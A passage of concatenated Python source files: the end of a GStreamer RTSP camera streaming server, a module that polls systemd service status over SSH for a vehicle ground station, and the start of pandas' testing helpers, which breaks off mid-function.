parser.add_argument('-d', '--device', action='store', default="picam", help='Video Device Path')
parser.add_argument('-P', '--rtspport', action='store', default=554, help='Set RTSP port')
parser.add_argument('-u', '--rtspname', action='store', default="live", help='Set RTSP name')
parser.add_argument('-W', '--rtspresolutionwidth', action='store', default=1280, help='Set RTSP resolution width')
parser.add_argument('-H', '--rtspresolutionheight', action='store', default=720, help='Set RTSP resolution height')
parser.add_argument('-M', '--mjpeg', action='store_true', help='Start with MJPEG codec')
args = parser.parse_args()
# --------------------------------------------------------------------------- #
# configure the service logging
# --------------------------------------------------------------------------- #
import logging
logging.basicConfig()
log = logging.getLogger()
# --------------------------------------------------------------------------- #
# import misc standard libraries
# --------------------------------------------------------------------------- #
import json
import time
import os.path
import subprocess
import signal
import sys
from ctypes import *
if args.verbose:
log.setLevel(logging.DEBUG)
else:
log.setLevel(logging.INFO)
# --------------------------------------------------------------------------- #
# Use gi to import GStreamer functionality
# --------------------------------------------------------------------------- #
import gi
gi.require_version('Gst','1.0')
gi.require_version('GstRtspServer','1.0')
gi.require_version('GstVideo','1.0')
from gi.repository import GObject, Gst, Gio, GstVideo, GstRtspServer, GLib
from threading import Thread, Lock
cam_mutex = Lock()
# -------------------
class StreamServer:
def __init__(self, device, file, port, name, width, height, codec):
signal.signal(signal.SIGTERM, self.exit_gracefully)
Gst.init(None)
self.mainloop = GObject.MainLoop()
self.server = GstRtspServer.RTSPServer()
self.mounts = self.server.get_mount_points()
self.device = device
self.file = file
self.port = port
self.name = name
self.factory = GstRtspServer.RTSPMediaFactory()
# Factory must be shared to allow multiple connections
self.factory.set_shared(True)
self.context_id = 0
self.running = False
self.stayAwake = True
GObject.threads_init()
log.info("StreamServer initialized")
self.codec_options = {0:"h264", 1:"MJPEG"}
self.codec = codec
# Declaring stream settings and initialize with safe default values
self.bitrate_range = [200000, 20000000]
self.bitrate = 5000000
# dynamic range compression
self.drc_options = {0:"off", 1:"low", 2:"medium", 3:"high"}
self.drc = 3
# key frame control (automatic = -1)
self.h264_i_frame_period_range = [-1, 60]
self.h264_i_frame_period = 15
# Shutter speed
# 0: Automatic (default)
# 1 to 10000000: Fixed shutter speed in microseconds
self.shutter_range = [0, 10000001]
self.shutter = 0
# ISO level
# 0: Automatic (default)
# 100 to 3200: Fixed ISO mode
self.iso_options = {0:"auto", 100:"ISO 100", 200:"ISO 200", 400:"ISO 400", 800:"ISO 800"}
self.iso = 0
##################################################################################################################################################################
# Sharpness
# 0 to 100: Tweak sharpness filter (default=0)
self.sharpness_range = [0, 100]
self.sharpness = 0
##################################################################################################################################################################
# Brightness
# 0 to 100: Tweak brightness (default=50)
self.brightness_range = [0, 100]
self.brightness = 50
##################################################################################################################################################################
# Saturation
# 0 to 100: Tweak saturation (default=0)
self.saturation_range = [0, 100]
self.saturation = 0
##################################################################################################################################################################
# Contrast
# 0 to 100: Tweak contrast (default=0 for video stream)
self.contrast_range = [0, 100]
self.contrast = 0
##################################################################################################################################################################
# Frames per second
# 15 to 90: >30fps only available at 640x480
self.fps = 30
self.fps_range = [15, 90]
self.horizontal_mirroring = False
self.vertical_mirroring = False
self.video_stabilisation = False
# White balance
# 000: Off
# 001: Automatic (default)
# 002: sunlight
# 003: Cloudy
# 004: Shade
# 005: Tungsten bulb
# 006: Fluorescent
# 007: Incandescent
# 008: Xenon flash
# 009: Horizon
self.white_balance_options = {0:"Off", 1:"auto", 2:"sunlight", 3:"cloudy", 4:"shade", 5:"tungsten", 6:"flourescent", 7:"incandescent", 8:"xenon", 9:"horizon"}
self.white_balance = 1
# RGB channels might be controlled individually, if white balance mode is "Off"
self.gain_red_range = [0.0, 8.0]
self.gain_red = 1.0
self.gain_green_range = [0.0, 8.0]
self.gain_green = 1.0
self.gain_blue_range = [0.0, 8.0]
self.gain_blue = 1.0
self.width_options = {0:640, 1:800, 2:1024, 3:1280, 4:1640, 5:1920}
self.width = width
self.height_options = {0:480, 1:600, 2:720, 3:768, 4:1024, 5:1232, 6:1080}
self.height = height
self.rotation = 0
self.configDate = 0
def exit_gracefully(self, signum, frame):
self.stop()
self.stayAwake = False
def check_range(self, value, value_range):
return value >= value_range[0] and value <= value_range[1]
def check_option(self, option, options):
return option in options
def readConfig(self):
try:
with open(self.file, 'r') as file:
# Filter out special characters that break the json parser
filter = ''.join(e for e in file.read() \
if e.isalnum() \
or e.isdigit() \
or e.isspace() \
or e == '"' or e == ':' or e == '.' or e == ',' \
or e == '#' or e == '(' or e == ')' or e == '{' \
or e == '}' or e == '[' or e == ']' \
or e == '-' or e == '_')
config = json.loads(filter)
log.info("Video settings loaded from "+str(self.file))
self.configDate = os.stat(self.file).st_mtime
if self.check_range(config["CodecControls"]["video_bitrate"], self.bitrate_range):
self.bitrate = config["CodecControls"]["video_bitrate"]
else:
log.error("bitrate out of range: " + str(config["CodecControls"]["video_bitrate"]))
if self.check_range(config["CodecControls"]["h264_i_frame_period"], self.h264_i_frame_period_range):
self.h264_i_frame_period = config["CodecControls"]["h264_i_frame_period"]
else:
log.error("i-frame period invalid: " + str(config["CodecControls"]["h264_i_frame_period"]))
if self.check_range(config["UserControls"]["brightness"], self.brightness_range):
self.brightness = config["UserControls"]["brightness"]
else:
log.error("brightness out of range: " + str(config["UserControls"]["brightness"]))
if self.check_range(config["UserControls"]["contrast"], self.contrast_range):
self.contrast = config["UserControls"]["contrast"]
else:
log.error("contrast out of range: " + str(config["UserControls"]["contrast"]))
if self.check_range(config["UserControls"]["saturation"], self.saturation_range):
self.saturation = config["UserControls"]["saturation"]
else:
log.error("saturation out of range: " + str(config["UserControls"]["saturation"]))
if self.check_range(config["UserControls"]["sharpness"], self.sharpness_range):
self.sharpness = config["UserControls"]["sharpness"]
else:
log.error("sharpness out of range: " + str(config["UserControls"]["sharpness"]))
if self.check_range(config["UserControls"]["red_balance"] / 1000.0, self.gain_red_range):
self.gain_red = config["UserControls"]["red_balance"] / 1000.0
else:
log.error("red balance out of range: " + str(config["UserControls"]["red_balance"] / 1000.0))
if self.check_range(config["UserControls"]["blue_balance"] / 1000.0, self.gain_blue_range):
self.gain_blue = config["UserControls"]["blue_balance"] / 1000.0
else:
log.error("blue balance out of range: " + str(config["UserControls"]["blue_balance"] / 1000.0))
self.horizontal_mirroring = config["UserControls"]["horizontal_flip"]
self.vertical_mirroring = config["UserControls"]["vertical_flip"]
self.rotation = config["UserControls"]["rotate"]
if config["CameraControls"]["auto_exposure"] == False and self.check_range(config["CameraControls"]["exposure_time_absolute"], self.saturation_range):
self.shutter = config["CameraControls"]["exposure_time_absolute"]
else:
self.shutter = 0
if self.check_option(config["CameraControls"]["white_balance_auto_preset"], self.white_balance_options):
self.white_balance = config["CameraControls"]["white_balance_auto_preset"]
else:
log.error("Invalid AWB preset: "+str(config["CameraControls"]["white_balance_auto_preset"]))
self.white_balance = 1
if self.check_option(config["CameraControls"]["iso_sensitivity"], self.iso_options):
self.iso = config["CameraControls"]["iso_sensitivity"]
else:
log.error("invalid ISO option: " + str(config["CameraControls"]["iso_sensitivity"]))
self.iso = 0
self.video_stabilisation = config["CameraControls"]["image_stabilization"]
# These settings will be ignored:
self.bitrate_mode = config["CodecControls"]["video_bitrate_mode"]
self.repeat_sequence_header = config["CodecControls"]["repeat_sequence_header"]
self.h264_level = config["CodecControls"]["h264_level"]
self.h264_profile = config["CodecControls"]["h264_profile"]
except Exception as e:
print("Unable to read config!")
print(str(e))
def launch(self):
log.debug("StreamServer.launch")
if self.running:
log.debug("StreamServer.launch called on running instance.")
self.stop() # Need to stop any instances first
if self.device == "picam":
launch_str = '( rpicamsrc preview=false bitrate='+str(self.bitrate)+' keyframe-interval='+str(self.h264_i_frame_period)+' drc='+str(self.drc)+ \
' image-effect=denoise shutter-speed='+str(self.shutter)+' iso='+str(self.iso)+ \
' brightness='+str(self.brightness)+' contrast='+str(self.contrast)+' saturation='+str(self.saturation)+ \
' sharpness='+str(self.sharpness)+' awb-mode='+str(self.white_balance)+ ' rotation='+str(self.rotation) + \
' hflip='+str(self.horizontal_mirroring)+' vflip='+str(self.vertical_mirroring) + ' video-stabilisation='+str(self.video_stabilisation)
if self.white_balance == 0:
log.info("Using custom white balance settings")
launch_str = launch_str + ' awb-gain-red='+str(self.gain_red)
launch_str = launch_str + ' awb-gain-green='+str(self.gain_green)
launch_str = launch_str + ' awb-gain-blue='+str(self.gain_blue)
#Completing the pipe
if self.codec == 0:
launch_str = launch_str + ' ! video/x-h264, framerate='+str(self.fps)+'/1, width='+str(self.width)+', height='+str(self.height)+' ! h264parse ! rtph264pay name=pay0 pt=96 )'
elif self.codec == 1:
launch_str = launch_str + ' ! image/jpeg, framerate='+str(self.fps)+'/1, width='+str(self.width)+', height='+str(self.height)+' ! jpegparse ! rtpjpegpay name=pay0 pt=96 )'
else:
log.error("Illegal codec")
else: # USB Camera
# Ignore most of the parameters
log.info("USB camera ignored most of the parameters")
launch_str = '( v4l2src device='+self.device+' brightness='+str(self.brightness)+' contrast='+str(self.contrast)+' saturation='+str(self.saturation)
launch_str = launch_str + ' ! image/jpeg,width='+str(self.width)+',height='+str(self.height)+',framerate='+str(self.fps)+'/1 ! omxmjpegdec ! omxh264enc target-bitrate='+str(self.bitrate)+' control-rate=variable ! video/x-h264,profile=baseline ! h264parse ! rtph264pay name=pay0 pt=96 )'
log.debug(launch_str)
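# Illustrative only: with the safe defaults initialized in __init__, the picam/h264
# branch produces a launch string roughly like the following (actual values depend on
# the loaded config file):
#   ( rpicamsrc preview=false bitrate=5000000 keyframe-interval=15 drc=3 image-effect=denoise
#     shutter-speed=0 iso=0 brightness=50 contrast=0 saturation=0 sharpness=0 awb-mode=1
#     rotation=0 hflip=False vflip=False video-stabilisation=False
#     ! video/x-h264, framerate=30/1, width=1280, height=720 ! h264parse ! rtph264pay name=pay0 pt=96 )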
cam_mutex.acquire()
try:
log.info("Starting service on port "+str(self.port)+" at url /"+self.name)
self.factory.set_launch(launch_str)
self.server.set_service(str(self.port))
self.mounts.add_factory("/"+str(self.name), self.factory)
self.context_id = self.server.attach(None)
#mainloop.run()
self.mainthread = Thread(target=self.mainloop.run)
self.mainthread.daemon = True
self.mainthread.start()
self.running = True
finally:
cam_mutex.release()
log.info("Running RTSP Server")
def start(self):
p = subprocess.Popen("ps -ax | grep rpos.js", shell=True, stdout=subprocess.PIPE)
output = p.stdout.read()
while self.stayAwake and "node" in output:
if os.stat(self.file).st_mtime != self.configDate:
log.info("Updating stream settings")
self.readConfig()
self.updateConfig()
else:
time.sleep(1.0)
log.warning("Quitting service")
def disconnect_all(self, a, b):
return GstRtspServer.RTSPFilterResult.REMOVE
def stop(self):
if self.running:
log.debug("Suspending RTSP Server")
cam_mutex.acquire()
try:
self.server.client_filter(self.disconnect_all)
time.sleep(0.3)
self.mainloop.quit()
self.mainthread.join()
self.mounts.remove_factory("/h264")
GLib.Source.remove(self.context_id)
self.running = False
finally:
cam_mutex.release()
def updateConfig(self):
#TODO: Manipulate the running pipe rather than destroying and recreating it.
self.stop()
self.launch()
if __name__ == '__main__':
codec = 0 # Default to H264
if args.mjpeg:
codec = 1
streamServer = StreamServer(args.device, args.file, args.rtspport, args.rtspname, \
args.rtspresolutionwidth, args.rtspresolutionheight,\
codec)
streamServer.readConfig()
streamServer.launch()
streamServer.start()
|
systemdservices.py
|
import threading
import time
from groundstation.models import SystemdServiceRunning, SystemdServiceEnabled, SystemdService
from groundstation.utils import sendstate
services = [
"roscore.service",
"rosrecord.service",
"cameras.service",
"infrastructure.service",
"lidar.service",
"missioncontrol.service",
"se.service",
"statistics.service",
"vehicleinterface.service",
"pixhawk.service",
"mission_acceleration.service",
"mission_inspection.service",
"mission_joystick.service",
"mission_skidpad.service",
"mission_trackdrive.service",
]
class SystemdServices:
def __init__(self, ssh):
self.ssh = ssh
def start(self):
thread = threading.Thread(target=self.forever)
thread.daemon = True
thread.start()
def forever(self):
while 1:
try:
self.retreive_services()
except Exception as e:
print("[systemdservices] Something unexpected happened while retrieving services: " + str(e))
time.sleep(1)
def retreive_services(self):
services_str = " ".join(services)
try:
statusnr_enabled, output_enabled = self.ssh.run_command("systemctl is-enabled " + services_str)
statusnr_active, output_active = self.ssh.run_command("systemctl is-active " + services_str)
except Exception as e:
out = []
for s in services:
out.append(SystemdService(name=s, running=SystemdServiceRunning.ERROR, statustext=str(e),
enabled=SystemdServiceEnabled.ERROR, lastupdate=time.time()))
sendstate({'systemdservices': out})
return
services_active = output_active.split("\n")
services_enabled = output_enabled.split("\n")
out = []
for i in range(len(services)):
out.append(SystemdService(name=services[i], lastupdate=time.time(),
running=SystemdServiceRunning.fromstring(services_active[i]),
enabled=SystemdServiceEnabled.fromstring(services_enabled[i]),
statustext="active: " + services_active[i] + "\n" + "enabled: " + services_enabled[i]))
sendstate({'systemdservices': out})
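# A brief sketch of the output format assumed above: "systemctl is-active a.service b.service"
# prints one status per line in argument order, e.g.
#   active
#   inactive
# so services_active[i] and services_enabled[i] line up positionally with services[i].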
|
_testing.py
|
import bz2
from collections import Counter
from contextlib import contextmanager
from datetime import datetime
from functools import wraps
import gzip
import os
from shutil import rmtree
import string
import tempfile
from typing import Any, Callable, List, Optional, Type, Union, cast
import warnings
import zipfile
import numpy as np
from numpy.random import rand, randn
from pandas._config.localization import ( # noqa:F401
can_set_locale,
get_locales,
set_locale,
)
import pandas._libs.testing as _testing
from pandas._typing import FilePathOrBuffer, FrameOrSeries
from pandas.compat import _get_lzma_file, _import_lzma
from pandas.core.dtypes.common import (
is_bool,
is_categorical_dtype,
is_datetime64_dtype,
is_datetime64tz_dtype,
is_extension_array_dtype,
is_interval_dtype,
is_number,
is_numeric_dtype,
is_period_dtype,
is_sequence,
is_timedelta64_dtype,
needs_i8_conversion,
)
from pandas.core.dtypes.missing import array_equivalent
import pandas as pd
from pandas import (
Categorical,
CategoricalIndex,
DataFrame,
DatetimeIndex,
Index,
IntervalIndex,
MultiIndex,
RangeIndex,
Series,
bdate_range,
)
from pandas.core.algorithms import take_1d
from pandas.core.arrays import (
DatetimeArray,
ExtensionArray,
IntervalArray,
PeriodArray,
TimedeltaArray,
period_array,
)
from pandas.io.common import urlopen
from pandas.io.formats.printing import pprint_thing
lzma = _import_lzma()
_N = 30
_K = 4
_RAISE_NETWORK_ERROR_DEFAULT = False
# set testing_mode
_testing_mode_warnings = (DeprecationWarning, ResourceWarning)
def set_testing_mode():
# set the testing mode filters
testing_mode = os.environ.get("PANDAS_TESTING_MODE", "None")
if "deprecate" in testing_mode:
warnings.simplefilter("always", _testing_mode_warnings)
def reset_testing_mode():
# reset the testing mode filters
testing_mode = os.environ.get("PANDAS_TESTING_MODE", "None")
if "deprecate" in testing_mode:
warnings.simplefilter("ignore", _testing_mode_warnings)
set_testing_mode()
def reset_display_options():
"""
Reset the display options for printing and representing objects.
"""
pd.reset_option("^display.", silent=True)
def round_trip_pickle(
obj: Any, path: Optional[FilePathOrBuffer] = None
) -> FrameOrSeries:
"""
Pickle an object and then read it again.
Parameters
----------
obj : any object
The object to pickle and then re-read.
path : str, path object or file-like object, default None
The path where the pickled object is written and then read.
Returns
-------
pandas object
The original object that was pickled and then re-read.
"""
_path = path
if _path is None:
_path = f"__{rands(10)}__.pickle"
with ensure_clean(_path) as temp_path:
pd.to_pickle(obj, temp_path)
return pd.read_pickle(temp_path)
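# Minimal usage sketch (illustrative, assuming a pandas test context):
#   s = Series([1, 2, 3])
#   result = round_trip_pickle(s)
#   assert_series_equal(result, s)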
def round_trip_pathlib(writer, reader, path: Optional[str] = None):
"""
Write an object to file specified by a pathlib.Path and read it back
Parameters
----------
writer : callable bound to pandas object
IO writing function (e.g. DataFrame.to_csv )
reader : callable
IO reading function (e.g. pd.read_csv )
path : str, default None
The path where the object is written and then read.
Returns
-------
pandas object
The original object that was serialized and then re-read.
"""
import pytest
Path = pytest.importorskip("pathlib").Path
if path is None:
path = "___pathlib___"
with ensure_clean(path) as path:
writer(Path(path))
obj = reader(Path(path))
return obj
def round_trip_localpath(writer, reader, path: Optional[str] = None):
"""
Write an object to file specified by a py.path LocalPath and read it back.
Parameters
----------
writer : callable bound to pandas object
IO writing function (e.g. DataFrame.to_csv )
reader : callable
IO reading function (e.g. pd.read_csv )
path : str, default None
The path where the object is written and then read.
Returns
-------
pandas object
The original object that was serialized and then re-read.
"""
import pytest
LocalPath = pytest.importorskip("py.path").local
if path is None:
path = "___localpath___"
with ensure_clean(path) as path:
writer(LocalPath(path))
obj = reader(LocalPath(path))
return obj
@contextmanager
def decompress_file(path, compression):
"""
Open a compressed file and return a file object.
Parameters
----------
path : str
The path where the file is read from.
compression : {'gzip', 'bz2', 'zip', 'xz', None}
Name of the decompression to use
Returns
-------
file object
"""
if compression is None:
f = open(path, "rb")
elif compression == "gzip":
f = gzip.open(path, "rb")
elif compression == "bz2":
f = bz2.BZ2File(path, "rb")
elif compression == "xz":
f = _get_lzma_file(lzma)(path, "rb")
elif compression == "zip":
zip_file = zipfile.ZipFile(path)
zip_names = zip_file.namelist()
if len(zip_names) == 1:
f = zip_file.open(zip_names.pop())
else:
raise ValueError(f"ZIP file {path} error. Only one file per ZIP.")
else:
raise ValueError(f"Unrecognized compression type: {compression}")
try:
yield f
finally:
f.close()
if compression == "zip":
zip_file.close()
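# Hedged usage sketch; "data.csv.gz" is a hypothetical path:
#   with decompress_file("data.csv.gz", compression="gzip") as fh:
#       raw = fh.read()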
def write_to_compressed(compression, path, data, dest="test"):
"""
Write data to a compressed file.
Parameters
----------
compression : {'gzip', 'bz2', 'zip', 'xz'}
The compression type to use.
path : str
The file path to write the data.
data : str
The data to write.
dest : str, default "test"
The destination file (for ZIP only)
Raises
------
ValueError : An invalid compression value was passed in.
"""
if compression == "zip":
import zipfile
compress_method = zipfile.ZipFile
elif compression == "gzip":
import gzip
compress_method = gzip.GzipFile
elif compression == "bz2":
import bz2
compress_method = bz2.BZ2File
elif compression == "xz":
compress_method = _get_lzma_file(lzma)
else:
raise ValueError(f"Unrecognized compression type: {compression}")
if compression == "zip":
mode = "w"
args = (dest, data)
method = "writestr"
else:
mode = "wb"
args = (data,)
method = "write"
with compress_method(path, mode=mode) as f:
getattr(f, method)(*args)
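# Hedged usage sketch; the path is hypothetical, and data should already be bytes for
# the non-zip writers because the file is opened in "wb" mode:
#   write_to_compressed("gzip", "out.csv.gz", b"a,b\n1,2\n")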
def assert_almost_equal(
left,
right,
check_dtype: Union[bool, str] = "equiv",
check_less_precise: Union[bool, int] = False,
**kwargs,
):
"""
Check that the left and right objects are approximately equal.
By approximately equal, we refer to objects that are numbers or that
contain numbers which may be equivalent to specific levels of precision.
Parameters
----------
left : object
right : object
check_dtype : bool or {'equiv'}, default 'equiv'
Check dtype if both left and right are of the same type. If 'equiv' is passed in,
then `RangeIndex` and `Int64Index` are also considered equivalent
when doing type checking.
check_less_precise : bool or int, default False
Specify comparison precision. 5 digits (False) or 3 digits (True)
after decimal points are compared. If int, then specify the number
of digits to compare.
When comparing two numbers, if the first number has magnitude less
than 1e-5, we compare the two numbers directly and check whether
they are equivalent within the specified precision. Otherwise, we
compare the **ratio** of the second number to the first number and
check whether it is equivalent to 1 within the specified precision.
"""
if isinstance(left, pd.Index):
assert_index_equal(
left,
right,
check_exact=False,
exact=check_dtype,
check_less_precise=check_less_precise,
**kwargs,
)
elif isinstance(left, pd.Series):
assert_series_equal(
left,
right,
check_exact=False,
check_dtype=check_dtype,
check_less_precise=check_less_precise,
**kwargs,
)
elif isinstance(left, pd.DataFrame):
assert_frame_equal(
left,
right,
check_exact=False,
check_dtype=check_dtype,
check_less_precise=check_less_precise,
**kwargs,
)
else:
# Other sequences.
if check_dtype:
if is_number(left) and is_number(right):
# Do not compare numeric classes, like np.float64 and float.
pass
elif is_bool(left) and is_bool(right):
# Do not compare bool classes, like np.bool_ and bool.
pass
else:
if isinstance(left, np.ndarray) or isinstance(right, np.ndarray):
obj = "numpy array"
else:
obj = "Input"
assert_class_equal(left, right, obj=obj)
_testing.assert_almost_equal(
left,
right,
check_dtype=check_dtype,
check_less_precise=check_less_precise,
**kwargs,
)
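# Minimal sketch of the dispatch above (values chosen purely for illustration):
#   assert_almost_equal(1.0, 1.0 + 1e-8)                                        # passes
#   assert_almost_equal(Series([1, 2]), Series([1.0, 2.0]), check_dtype=False)  # passes
#   assert_almost_equal(1.0, 1.1)                                               # raises AssertionError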
def _check_isinstance(left, right, cls):
"""
Helper method for our assert_* methods that ensures that
the two objects being compared have the right type before
proceeding with the comparison.
Parameters
----------
left : The first object being compared.
right : The second object being compared.
cls : The class type to check against.
Raises
------
AssertionError : Either `left` or `right` is not an instance of `cls`.
"""
cls_name = cls.__name__
if not isinstance(left, cls):
raise AssertionError(
f"{cls_name} Expected type {cls}, found {type(left)} instead"
)
if not isinstance(right, cls):
raise AssertionError(
f"{cls_name} Expected type {cls}, found {type(right)} instead"
)
def assert_dict_equal(left, right, compare_keys: bool = True):
_check_isinstance(left, right, dict)
_testing.assert_dict_equal(left, right, compare_keys=compare_keys)
def randbool(size=(), p: float = 0.5):
return rand(*size) <= p
RANDS_CHARS = np.array(list(string.ascii_letters + string.digits), dtype=(np.str_, 1))
RANDU_CHARS = np.array(
list("".join(map(chr, range(1488, 1488 + 26))) + string.digits),
dtype=(np.unicode_, 1),
)
def rands_array(nchars, size, dtype="O"):
"""
Generate an array of byte strings.
"""
retval = (
np.random.choice(RANDS_CHARS, size=nchars * np.prod(size))
.view((np.str_, nchars))
.reshape(size)
)
return retval.astype(dtype)
def randu_array(nchars, size, dtype="O"):
"""
Generate an array of unicode strings.
"""
retval = (
np.random.choice(RANDU_CHARS, size=nchars * np.prod(size))
.view((np.unicode_, nchars))
.reshape(size)
)
return retval.astype(dtype)
def rands(nchars):
"""
Generate one random byte string.
See `rands_array` if you want to create an array of random strings.
"""
return "".join(np.random.choice(RANDS_CHARS, nchars))
def close(fignum=None):
from matplotlib.pyplot import get_fignums, close as _close
if fignum is None:
for fignum in get_fignums():
_close(fignum)
else:
_close(fignum)
# -----------------------------------------------------------------------------
# contextmanager to ensure the file cleanup
@contextmanager
def ensure_clean(filename=None, return_filelike=False, **kwargs):
"""
Gets a temporary path and agrees to remove on close.
Parameters
----------
filename : str (optional)
if None, creates a temporary file which is then removed when out of
scope. if passed, creates temporary file with filename as ending.
return_filelike : bool (default False)
if True, returns a file-like which is *always* cleaned. Necessary for
savefig and other functions which want to append extensions.
**kwargs
Additional keywords passed in for creating a temporary file.
:meth:`tempfile.TemporaryFile` is used when `return_filelike` is ``True``.
:meth:`tempfile.mkstemp` is used when `return_filelike` is ``False``.
Note that the `filename` parameter will be passed in as the `suffix`
argument to either function.
See Also
--------
tempfile.TemporaryFile
tempfile.mkstemp
"""
filename = filename or ""
fd = None
kwargs["suffix"] = filename
if return_filelike:
f = tempfile.TemporaryFile(**kwargs)
try:
yield f
finally:
f.close()
else:
# Don't generate tempfile if using a path with directory specified.
if len(os.path.dirname(filename)):
raise ValueError("Can't pass a qualified name to ensure_clean()")
try:
fd, filename = tempfile.mkstemp(**kwargs)
except UnicodeEncodeError:
import pytest
pytest.skip("no unicode file names on this system")
try:
yield filename
finally:
try:
os.close(fd)
except OSError:
print(f"Couldn't close file descriptor: {fd} (file: {filename})")
try:
if os.path.exists(filename):
os.remove(filename)
except OSError as e:
print(f"Exception on removing file: {e}")
@contextmanager
def ensure_clean_dir():
"""
Gets a temporary directory path and agrees to remove it on close.
Yields
------
Temporary directory path
"""
directory_name = tempfile.mkdtemp(suffix="")
try:
yield directory_name
finally:
try:
rmtree(directory_name)
except OSError:
pass
@contextmanager
def ensure_safe_environment_variables():
"""
Get a context manager to safely set environment variables
All changes will be undone on close, hence environment variables set
within this contextmanager will neither persist nor change global state.
"""
saved_environ = dict(os.environ)
try:
yield
finally:
os.environ.clear()
os.environ.update(saved_environ)
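# Minimal sketch: variables set inside the block do not leak out.
#   with ensure_safe_environment_variables():
#       os.environ["PANDAS_TESTING_MODE"] = "deprecate"  # hypothetical value
#   # os.environ is restored to its previous state here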
# -----------------------------------------------------------------------------
# Comparators
def equalContents(arr1, arr2) -> bool:
"""
Checks if the set of unique elements of arr1 and arr2 are equivalent.
"""
return frozenset(arr1) == frozenset(arr2)
def assert_index_equal(
left: Index,
right: Index,
exact: Union[bool, str] = "equiv",
check_names: bool = True,
check_less_precise: Union[bool, int] = False,
check_exact: bool = True,
check_categorical: bool = True,
obj: str = "Index",
) -> None:
"""
Check that left and right Index are equal.
Parameters
----------
left : Index
right : Index
exact : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical. If 'equiv', then RangeIndex can be substituted for
Int64Index as well.
check_names : bool, default True
Whether to check the names attribute.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
check_exact : bool, default True
Whether to compare number exactly.
check_categorical : bool, default True
Whether to compare internal Categorical exactly.
obj : str, default 'Index'
Specify object name being compared, internally used to show appropriate
assertion message.
"""
__tracebackhide__ = True
def _check_types(l, r, obj="Index"):
if exact:
assert_class_equal(l, r, exact=exact, obj=obj)
# Skip exact dtype checking when `check_categorical` is False
if check_categorical:
assert_attr_equal("dtype", l, r, obj=obj)
# allow string-like to have different inferred_types
if l.inferred_type in ("string"):
assert r.inferred_type in ("string")
else:
assert_attr_equal("inferred_type", l, r, obj=obj)
def _get_ilevel_values(index, level):
# accept level number only
unique = index.levels[level]
level_codes = index.codes[level]
filled = take_1d(unique._values, level_codes, fill_value=unique._na_value)
values = unique._shallow_copy(filled, name=index.names[level])
return values
# instance validation
_check_isinstance(left, right, Index)
# class / dtype comparison
_check_types(left, right, obj=obj)
# level comparison
if left.nlevels != right.nlevels:
msg1 = f"{obj} levels are different"
msg2 = f"{left.nlevels}, {left}"
msg3 = f"{right.nlevels}, {right}"
raise_assert_detail(obj, msg1, msg2, msg3)
# length comparison
if len(left) != len(right):
msg1 = f"{obj} length are different"
msg2 = f"{len(left)}, {left}"
msg3 = f"{len(right)}, {right}"
raise_assert_detail(obj, msg1, msg2, msg3)
# MultiIndex special comparison for little-friendly error messages
if left.nlevels > 1:
left = cast(MultiIndex, left)
right = cast(MultiIndex, right)
for level in range(left.nlevels):
# cannot use get_level_values here because it can change dtype
llevel = _get_ilevel_values(left, level)
rlevel = _get_ilevel_values(right, level)
lobj = f"MultiIndex level [{level}]"
assert_index_equal(
llevel,
rlevel,
exact=exact,
check_names=check_names,
check_less_precise=check_less_precise,
check_exact=check_exact,
obj=lobj,
)
# get_level_values may change dtype
_check_types(left.levels[level], right.levels[level], obj=obj)
# skip exact index checking when `check_categorical` is False
if check_exact and check_categorical:
if not left.equals(right):
diff = np.sum((left.values != right.values).astype(int)) * 100.0 / len(left)
msg = f"{obj} values are different ({np.round(diff, 5)} %)"
raise_assert_detail(obj, msg, left, right)
else:
_testing.assert_almost_equal(
left.values,
right.values,
check_less_precise=check_less_precise,
check_dtype=exact,
obj=obj,
lobj=left,
robj=right,
)
# metadata comparison
if check_names:
assert_attr_equal("names", left, right, obj=obj)
if isinstance(left, pd.PeriodIndex) or isinstance(right, pd.PeriodIndex):
assert_attr_equal("freq", left, right, obj=obj)
if isinstance(left, pd.IntervalIndex) or isinstance(right, pd.IntervalIndex):
assert_interval_array_equal(left._values, right._values)
if check_categorical:
if is_categorical_dtype(left) or is_categorical_dtype(right):
assert_categorical_equal(left._values, right._values, obj=f"{obj} category")
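# Minimal sketch of the 'equiv' behaviour documented above (pandas 1.x semantics assumed):
#   assert_index_equal(Index([0, 1, 2]), RangeIndex(3))              # passes: equivalent classes
#   assert_index_equal(Index([0, 1, 2]), RangeIndex(3), exact=True)  # raises: classes differ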
def assert_class_equal(left, right, exact: Union[bool, str] = True, obj="Input"):
"""
Checks classes are equal.
"""
__tracebackhide__ = True
def repr_class(x):
if isinstance(x, Index):
# return Index as it is to include values in the error message
return x
return type(x).__name__
if exact == "equiv":
if type(left) != type(right):
# allow equivalence of Int64Index/RangeIndex
types = {type(left).__name__, type(right).__name__}
if len(types - {"Int64Index", "RangeIndex"}):
msg = f"{obj} classes are not equivalent"
raise_assert_detail(obj, msg, repr_class(left), repr_class(right))
elif exact:
if type(left) != type(right):
msg = f"{obj} classes are different"
raise_assert_detail(obj, msg, repr_class(left), repr_class(right))
def assert_attr_equal(attr: str, left, right, obj: str = "Attributes"):
"""
Check attributes are equal. Both objects must have attribute.
Parameters
----------
attr : str
Attribute name being compared.
left : object
right : object
obj : str, default 'Attributes'
Specify object name being compared, internally used to show appropriate
assertion message
"""
__tracebackhide__ = True
left_attr = getattr(left, attr)
right_attr = getattr(right, attr)
if left_attr is right_attr:
return True
elif (
is_number(left_attr)
and np.isnan(left_attr)
and is_number(right_attr)
and np.isnan(right_attr)
):
# np.nan
return True
try:
result = left_attr == right_attr
except TypeError:
# datetimetz on rhs may raise TypeError
result = False
if not isinstance(result, bool):
result = result.all()
if result:
return True
else:
msg = f'Attribute "{attr}" are different'
raise_assert_detail(obj, msg, left_attr, right_attr)
def assert_is_valid_plot_return_object(objs):
import matplotlib.pyplot as plt
if isinstance(objs, (pd.Series, np.ndarray)):
for el in objs.ravel():
msg = (
"one of 'objs' is not a matplotlib Axes instance, "
f"type encountered {repr(type(el).__name__)}"
)
assert isinstance(el, (plt.Axes, dict)), msg
else:
msg = (
"objs is neither an ndarray of Artist instances nor a single "
"ArtistArtist instance, tuple, or dict, 'objs' is a "
f"{repr(type(objs).__name__)}"
)
assert isinstance(objs, (plt.Artist, tuple, dict)), msg
def assert_is_sorted(seq):
"""Assert that the sequence is sorted."""
if isinstance(seq, (Index, Series)):
seq = seq.values
# sorting does not change precisions
assert_numpy_array_equal(seq, np.sort(np.array(seq)))
def assert_categorical_equal(
